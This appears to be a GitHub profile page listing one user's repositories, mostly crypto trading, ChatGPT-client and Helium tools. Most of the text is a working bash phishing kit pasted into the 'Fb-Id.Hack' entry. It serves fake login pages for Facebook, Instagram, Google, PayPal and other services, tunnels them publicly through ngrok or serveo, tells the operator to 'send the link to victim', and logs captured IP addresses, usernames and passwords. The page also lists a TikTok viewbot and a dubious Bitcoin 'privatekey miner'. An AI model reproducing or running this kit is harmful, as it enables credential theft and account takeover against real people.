Pinned Repositories
amm-arbitrageur
An arbitrage bot between Uniswap AMMs
ASIC-Bitcoin-privatekey-Miner
ASIC Bitcoin privatekey Miner: NEW! Firmware (2021 Feb) S9, T9, S17,T19 to S19, S19Pro
awslambdaproxy
An AWS Lambda powered HTTP/SOCKS web proxy
barong
Barong auth server
baseapp
OpenDAX Trading user interface
betaapi
BetterCrewLink
Free, open, Among Us Proximity Chat
Binance-historical-price-collector
A script that collects historical price data into a .csv file
Helium-VPS
By setting up a VPS on Linode you can download this installations Script and this will do all the work you need
lora-packet-forwarder-analyzer
Shinoby92's Repositories
Shinoby92/Helium-VPS
By setting up a VPS on Linode you can download this installations Script and this will do all the work you need
Shinoby92/lora-packet-forwarder-analyzer
Shinoby92/amm-arbitrageur
An arbitrage bot between Uniswap AMMs
Shinoby92/barong
Barong auth server
Shinoby92/baseapp
OpenDAX Trading user interface
Shinoby92/binance-trading-bot-new-coins
This Binance trading bot detects new coins as soon as they are listed on the Binance exchange and automatically places sell and buy orders. It comes with trailing stop loss and other features. If you like this project please consider donating via Brave.
Shinoby92/ChatGPT
Lightweight package for interacting with ChatGPT's API by OpenAI. Uses reverse engineered official API.
Shinoby92/ChatGPT-App-React-Native-TypeScript
ChatGPT-App-React-Native-TypeScript
Shinoby92/chatgpt-io
ChatGPT Client API, Blazing Fast, without using browser
Shinoby92/ChatGPT.py
Python implementation of Unofficial ChatGPT Client
Shinoby92/ChatGPTBot
GPT-3 backed Discord bot to chat with.
Shinoby92/Controllino
Information on how to manage your Controllino v1
Shinoby92/cuteastros
This is a nft minting dapp made with next.js based on thirdweb.
Shinoby92/Fb-Id.Hack
#!/bin/bash #code recorded by tech cochi #https://youtube.com/c/techcochi #https://github.com/rixon-cochi #https://techcochi.blogspot.com trap 'printf "\n";stop;exit 1' 2 deps() { command -v php > /dev/null 2>&1 || { echo >&2 "PHP is not installed ! Install it."; exit 1; } command -v curl > /dev/null 2>&1 || { echo >&2 "Curl is not installed ! Install it."; exit 1; } command -v ssh > /dev/null 2>&1 || { echo >&2 "Openssh is not installed ! Install it"; exit 1; } command -v unzip > /dev/null 2>&1 || { echo >&2 "Unzip is not installed ! Install it"; exit 1; } } banner() { clear printf " \e[91m ███████╗\e[0m\e[1;92m ███╗ ███╗ \e[0m\e[1;93m ███████╗ \e[0m\e[1;91m ▄█▀─▄▄▄▄▄▄▄─▀█▄ \e[0m\n" printf " \e[91m ██╔════╝\e[0m\e[1;92m ████╗ ████║ \e[0m\e[1;93m ██╔════╝ \e[0m\e[1;91m ▀█████████████▀ \e[0m\n" printf " \e[91m ███████╗\e[0m\e[1;92m ██╔████╔██║ \e[0m\e[1;93m █████╗ \e[0m\e[1;91m █▄███▄█ \e[0m\n" printf " \e[91m ╚════██║\e[0m\e[1;92m ██║╚██╔╝██║ \e[0m\e[1;93m ██╔══╝ \e[0m\e[1;91m █████ \e[0m\n" printf " \e[91m ███████║\e[0m\e[1;92m ██║ ╚═╝ ██║ \e[0m\e[1;93m ██║ \e[0m\e[1;91m █▀█▀█ \e[0m\n" printf " \e[91m ╚══════╝\e[0m\e[1;92m ╚═╝ ╚═╝ \e[0m\e[1;93m ╚═╝ \e[0m\e[40;38;5;82mversion\e[30;48;5;82m1.2\e[0m\n" printf " \e[44m CODE RE BY TECH COCHI \e[0m\n" printf " \n" } menu() { printf " \e[1;31m[\e[0m\e[1;77m01\e[0m\e[1;31m]\e[0m\e[1;92m Facebook \e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m02\e[0m\e[1;31m]\e[0m\e[1;92m Instagram \e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m03\e[0m\e[1;31m]\e[0m\e[1;92m Google \e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m04\e[0m\e[1;31m]\e[0m\e[1;92m Github \e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m05\e[0m\e[1;31m]\e[0m\e[1;92m Netflix \e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m06\e[0m\e[1;31m]\e[0m\e[1;92m Paypal \e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m07\e[0m\e[1;31m]\e[0m\e[1;92m Pinterest \e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m08\e[0m\e[1;31m]\e[0m\e[1;92m Snapchat \e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m09\e[0m\e[1;31m]\e[0m\e[1;92m Spotify \e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m10\e[0m\e[1;31m]\e[0m\e[1;92m Twitter \e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m11\e[0m\e[1;31m]\e[0m\e[1;92m Yahoo \e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m12\e[0m\e[1;31m]\e[0m\e[1;92m Wordpress \e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m13\e[0m\e[1;31m]\e[0m\e[1;92m Update \e[0m\n" printf " \e[0m\e[1;31m[\e[0m\e[1;77m00\e[0m\e[1;31m] \e[0m\e[1;92mExit\e[0m\n" printf " \e[0m\n" read -p $' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Select an option: \e[0m\e[1;91m\en' option if [[ $option == 1 || $option == 01 ]]; then facebook elif [[ $option == 2 || $option == 02 ]]; then instagram elif [[ $option == 3 || $option == 03 ]]; then gmail elif [[ $option == 4 || $option == 04 ]]; then server="github" start elif [[ $option == 5 || $option == 05 ]]; then server="netflix" start elif [[ $option == 6 || $option == 06 ]]; then server="paypal" start elif [[ $option == 7 || $option == 07 ]]; then server="pinterest" start elif [[ $option == 8 || $option == 08 ]]; then server="snapchat" start elif [[ $option == 9 || $option == 09 ]]; then server="spotify" start elif [[ $option == 10 ]]; then server="twitter" start elif [[ $option == 11 ]]; then server="yahoo" start elif [[ $option == 12 ]]; then server="wordpress" start elif [[ $option == 13 ]]; then bash update elif [[ $option == 0 || $option == 00 ]]; then exit 1 else printf " \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\e[1;92m Invalid option \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\n" sleep 1 banner menu fi } facebook(){ printf " \n" printf " \e[1;31m[\e[0m\e[1;77m01\e[0m\e[1;31m]\e[0m\e[1;92m Traditional Login Page\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m02\e[0m\e[1;31m]\e[0m\e[1;92m Advanced Voting Poll Login Page\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m03\e[0m\e[1;31m]\e[0m\e[1;92m Fake Security Login Page\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m04\e[0m\e[1;31m]\e[0m\e[1;92m Facebook Messenger Login Page\e[0m\n" printf "\e[0m\n" read -p $' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Select an option: \e[0m\e[1;91m\en' option if [[ $option == 1 || $option == 01 ]]; then server="facebook" start elif [[ $option == 2 || $option == 02 ]]; then server="fb_advanced" start elif [[ $option == 3 || $option == 03 ]]; then server="fb_security" start elif [[ $option == 4 || $option == 04 ]]; then server="fb_messenger" start else printf " \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\e[1;92m Invalid option \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\n" sleep 1 banner menu fi } instagram(){ printf " \n" printf " \e[1;31m[\e[0m\e[1;77m01\e[0m\e[1;31m]\e[0m\e[1;92m Traditional Login Page\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m02\e[0m\e[1;31m]\e[0m\e[1;92m Auto Followers Login Page\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m03\e[0m\e[1;31m]\e[0m\e[1;92m Blue Badge Verify Login Page\e[0m\n" printf "\e[0m\n" read -p $' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Select an option: \e[0m\e[1;91m\en' option if [[ $option == 1 || $option == 01 ]]; then server="instagram" start elif [[ $option == 2 || $option == 02 ]]; then server="ig_followers" start elif [[ $option == 3 || $option == 03 ]]; then server="ig_verify" start else printf " \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\e[1;92m Invalid option \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\n" sleep 1 banner menu fi } gmail(){ printf " \n" printf " \e[1;31m[\e[0m\e[1;77m01\e[0m\e[1;31m]\e[0m\e[1;92m Gmail Old Login Page\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m02\e[0m\e[1;31m]\e[0m\e[1;92m Gmail New Login Page\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m03\e[0m\e[1;31m]\e[0m\e[1;92m Advanced Voting Poll\e[0m\n" printf "\e[0m\n" read -p $' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Select an option: \e[0m\e[1;91m\en' option if [[ $option == 1 || $option == 01 ]]; then server="google" start elif [[ $option == 2 || $option == 02 ]]; then server="google_new" start elif [[ $option == 3 || $option == 03 ]]; then server="google_poll" start else printf " \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\e[1;92m Invalid option \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\n" sleep 1 banner menu fi } stop() { checkngrok=$(ps aux | grep -o "ngrok" | head -n1) checkphp=$(ps aux | grep -o "php" | head -n1) checkssh=$(ps aux | grep -o "ssh" | head -n1) if [[ $checkngrok == *'ngrok'* ]]; then pkill -f -2 ngrok > /dev/null 2>&1 killall -2 ngrok > /dev/null 2>&1 fi if [[ $checkphp == *'php'* ]]; then pkill -f -2 php > /dev/null 2>&1 killall -2 php > /dev/null 2>&1 fi if [[ $checkssh == *'ssh'* ]]; then pkill -f -2 ssh > /dev/null 2>&1 killall ssh > /dev/null 2>&1 fi if [[ -e linksender ]]; then rm -rf linksender fi } start() { if [[ -e linksender ]]; then rm -rf linksender fi printf "\n" printf " \e[1;31m[\e[0m\e[1;77m01\e[0m\e[1;31m]\e[0m\e[1;92m LocalHost\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m02\e[0m\e[1;31m]\e[0m\e[1;92m Ngrok.io\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m03\e[0m\e[1;31m]\e[0m\e[1;92m Serveo.net\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m04\e[0m\e[1;31m]\e[0m\e[1;92m Localhost.run\e[0m\n" d_o_server="2" printf "\n" read -p $' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Select a Port Forwarding option: \e[0m\e[1;91m\en' option_server option_server="${option_server:-${d_o_server}}" if [[ $option_server == 3 || $option_server == 03 ]]; then start_s elif [[ $option_server == 2 || $option_server == 02 ]]; then start_n elif [[ $option_server == 4 || $option_server == 04 ]]; then start_local elif [[ $option_server == 1 || $option_server == 01 ]]; then start_l else printf " \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\e[1;92m Invalid option \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\n" sleep 1 banner start fi } start_s() { if [[ -e websites/$server/ip.txt ]]; then rm -rf websites/$server/ip.txt fi if [[ -e websites/$server/usernames.txt ]]; then rm -rf websites/$server/usernames.txt fi def_port="5555" printf "\e[0m\n" printf ' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Select a Port (Default:\e[0m\e[1;91m %s \e[0m\e[1;34m): \e[0m\e[1;91m' $def_port read port port="${port:-${def_port}}" start_serveo } start_serveo() { printf "\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Initializing...\e[0m\e[1;34m(\e[0m\e[1;91mlocalhost:$port\e[0m\e[1;34m)\e[0m\n" cd websites/$server && php -S 127.0.0.1:$port > /dev/null 2>&1 & sleep 2 printf "\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Launching Serveo ..\e[0m\n" if [[ -e linksender ]]; then rm -rf linksender fi $(which sh) -c 'ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:'$port' serveo.net 2> /dev/null > linksender ' & printf "\n" sleep 7 send_url=$(grep -o "https://[0-9a-z]*\.serveo.net" linksender) printf "\n" printf ' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;91m Send the link to victim :\e[0m\e[1;92m %s \n' $send_url printf "\n" found } start_n() { if [[ -e websites/$server/ip.txt ]]; then rm -rf websites/$server/ip.txt fi if [[ -e websites/$server/usernames.txt ]]; then rm -rf websites/$server/usernames.txt fi if [[ -e ngrok ]]; then echo "" else printf "\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Initializing...\e[0m\e[1;93m(\e[0m\e[1;91mlocalhost:5555\e[0m\e[1;93m)\e[0m\n" arch=$(uname -a | grep -o 'arm' | head -n1) arch2=$(uname -a | grep -o 'Android' | head -n1) if [[ $arch == *'arm'* ]] || [[ $arch2 == *'Android'* ]] ; then curl -LO https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip > /dev/null 2>&1 if [[ -e ngrok-stable-linux-arm.zip ]]; then unzip ngrok-stable-linux-arm.zip > /dev/null 2>&1 chmod +x ngrok rm -rf ngrok-stable-linux-arm.zip else printf " \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;92m Error \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;91m Please Install All Packges.\e[0m\n" exit 1 fi else curl -LO https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip > /dev/null 2>&1 if [[ -e ngrok-stable-linux-386.zip ]]; then unzip ngrok-stable-linux-386.zip > /dev/null 2>&1 chmod +x ngrok rm -rf ngrok-stable-linux-386.zip else printf " \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;92m Error \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;91m Please Install All Packges.\e[0m\n" exit 1 fi fi fi printf "\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Launching Ngrok ..\e[0m\n" cd websites/$server && php -S 127.0.0.1:5555 > /dev/null 2>&1 & sleep 2 ./ngrok http 5555 > /dev/null 2>&1 & sleep 10 link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io") printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;91m Send the link to victim :\e[0m\e[1;92m %s \n" $link found } start_local(){ def_port="5555" printf "\e[0m\n" printf ' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Select a Port (Default:\e[0m\e[1;91m %s \e[0m\e[1;93m): \e[0m\e[1;91m' $def_port read port port="${port:-${def_port}}" printf "\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Initializing...\e[0m\e[1;94m(\e[0m\e[1;91mlocalhost:$port\e[0m\e[1;93m)\e[0m\n" cd websites/$server && php -S 127.0.0.1:$port > /dev/null 2>&1 & sleep 2 printf "\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Launching LocalHostRun ..\e[0m\n" printf "\n" if [[ -e linksender ]]; then rm -rf linksender fi printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;91m Ctrl + C to view Login Info.Press it After the Victim Opened It.\e[0m\n" printf "\e[1;93m\n" ssh -R 80:localhost:$port ssh.localhost.run 2>&1 printf "\e[0m\n" printf "\n" printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;92m Login Info..\e[0m\n" while [ true ]; do if [[ -e "websites/$server/ip.txt" ]]; then c_ip rm -rf websites/$server/ip.txt fi sleep 0.75 if [[ -e "websites/$server/usernames.txt" ]]; then account=$(grep -o 'Username:.*' websites/$server/usernames.txt | cut -d " " -f2) IFS=$'\n' password=$(grep -o 'Pass:.*' websites/$server/usernames.txt | cut -d ":" -f2) printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Account:\e[0m\e[1;91m %s\n\e[0m" $account printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Password:\e[0m\e[1;91m %s\n\e[0m" $password cat websites/$server/usernames.txt >> websites/$server/login_info.txt printf "\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;91m Saved:\e[0m\e[1;92m websites/%s/login_info.txt\e[0m\n" $server printf "\n" printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;91m Press Ctrl + C to exit.\e[0m\n" rm -rf websites/$server/usernames.txt fi sleep 0.75 done } start_l() { def_port="5555" printf "\e[0m\n" printf ' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Select a Port (Default:\e[0m\e[1;91m %s \e[0m\e[1;93m): \e[0m\e[1;91m' $def_port read port port="${port:-${def_port}}" printf "\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Initializing...\e[0m\e[1;93m(\e[0m\e[1;91mlocalhost:$port\e[0m\e[1;93m)\e[0m\n" cd websites/$server && php -S 127.0.0.1:$port > /dev/null 2>&1 & sleep 2 printf "\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Successfully Hosted at :\e[0m\e[1;92m http://localhost:$port\e[0m\n" printf "\n" found } found() { printf "\n" printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;92m Waiting for Login Info,\e[0m\e[1;91m Ctrl + C to exit.\e[0m\n" printf "\n" while [ true ]; do if [[ -e "websites/$server/ip.txt" ]]; then printf "\n" printf " \e[1;31m[\e[0m\e[1;77m*\e[0m\e[1;31m]\e[0m\e[1;93m Victim IP Found!\n" printf "\n" c_ip rm -rf websites/$server/ip.txt fi sleep 0.75 if [[ -e "websites/$server/usernames.txt" ]]; then printf " \e[1;31m[\e[0m\e[1;77m*\e[0m\e[1;31m]\e[0m\e[1;93m Login info Found !!\n" printf "\n" c_cred rm -rf websites/$server/usernames.txt fi sleep 0.75 done } c_ip() { touch websites/$server/login_info.txt ip=$(grep -a 'IP:' websites/$server/ip.txt | cut -d " " -f2 | tr -d '\r') IFS=$'\n' ua=$(grep 'User-Agent:' websites/$server/ip.txt | cut -d '"' -f2) printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Victim IP:\e[0m\e[1;91m %s\e[0m\n" $ip printf "\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;91m Saved:\e[0m\e[1;92m websites/%s/victim_ip.txt\e[0m\n" $server printf "\n" cat websites/$server/ip.txt >> websites/$server/victim_ip.txt } c_cred() { account=$(grep -o 'Username:.*' websites/$server/usernames.txt | cut -d " " -f2) IFS=$'\n' password=$(grep -o 'Pass:.*' websites/$server/usernames.txt | cut -d ":" -f2) printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Account:\e[0m\e[1;91m %s\n\e[0m" $account printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Password:\e[0m\e[1;91m %s\n\e[0m" $password cat websites/$server/usernames.txt >> websites/$server/login_info.txt printf "\e[0m\n" printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;91m Saved:\e[0m\e[1;92m websites/%s/login_info.txt\e[0m\n" $server printf "\n" printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;92m Waiting for Next Login Info,\e[0m\e[1;91m Ctrl + C to exit.\e[0m\n" } banner deps menu
Shinoby92/flagwaver
A web app for simulating a waving flag.
Shinoby92/flutter-chatgpt-demo
Shinoby92/gpt-engineer
Specify what you want it to build, the AI asks for clarification, and then builds it.
Shinoby92/hdl-deity-mint-site
NFT Mint site for the Deity built in Next.js with TypeScript and deployed to Vercel. Includes smart contract interactions and credit card purchase ability through Crossmint.
Shinoby92/helium-DIY-middleman
Code here acts as a middleman between LoRa gateways running Semtech packet forwarders and servers ingesting packet forwarder data
Shinoby92/helium-miner-log-analyzer
Small tool that extracts witness data from Helium miner logs.
Shinoby92/hollaex-kit
Exchange Starter Kit to run your own Digital Asset Trading Exchange Platform
Shinoby92/instaloader
Download pictures (or videos) along with their captions and other metadata from Instagram.
Shinoby92/opendax
Open-Source Cloud-Native Digital Asset & Cryptocurrency Exchange Platform
Shinoby92/peatio
Open-source crypto currency exchange software (https://openware.com)
Shinoby92/rainbowkit-mint-nft-demo
rainbowkit-mint-nft-demo
Shinoby92/samplicator
Send copies of (UDP) datagrams to multiple receivers, with optional sampling and spoofing
Shinoby92/TikTok-Compilation-Video-Generator
A system of bots that collects clips automatically via custom made filters, lets you easily browse these clips, and puts them together into a compilation video ready to be uploaded straight to any social media platform. Full VPS support is provided, along with an accounts system so multiple users can use the bot at once. This bot is split up into three separate programs. The server. The client. The video generator. These programs perform different functions that when combined creates a very powerful system for auto generating compilation videos.
Shinoby92/TikTok-Viewbot
Xtekky's free Tiktok viewbot with 400+ stars as his account got terminated on github.
Shinoby92/WechatBot
Shinoby92/whatsgpt
WhatsApp Bot for ChatGPT with multiple user support